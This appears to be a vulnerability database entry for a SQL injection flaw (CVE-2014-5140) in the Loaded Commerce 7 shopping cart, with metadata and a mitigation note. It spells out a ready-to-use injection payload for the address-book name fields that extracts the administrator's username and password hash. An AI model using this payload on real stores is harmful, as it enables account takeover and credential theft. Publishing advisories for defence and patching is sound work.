vendor:
LoadedCommerce7
by:
Breaking Technology Research Labs
8,8
CVSS
HIGH
SQL injection, unsafe string replacement
89
CWE
Product Name: LoadedCommerce7
Affected Version From: Loaded Commerce 7
Affected Version To: Loaded Commerce 7
Patch Exists: YES
Related CWE: CVE-2014-5140
CPE: a:loadedcommerce:loaded_commerce_7
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014
LoadedCommerce7 Systemic Query Factory Vulnerability
Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. Have a valid customer account and create a new contact in your address book using the following values. First name: :entry_lastname, Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# The new contact will be added to your address book with the admin hash as the contact's street address
Mitigation:
Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value.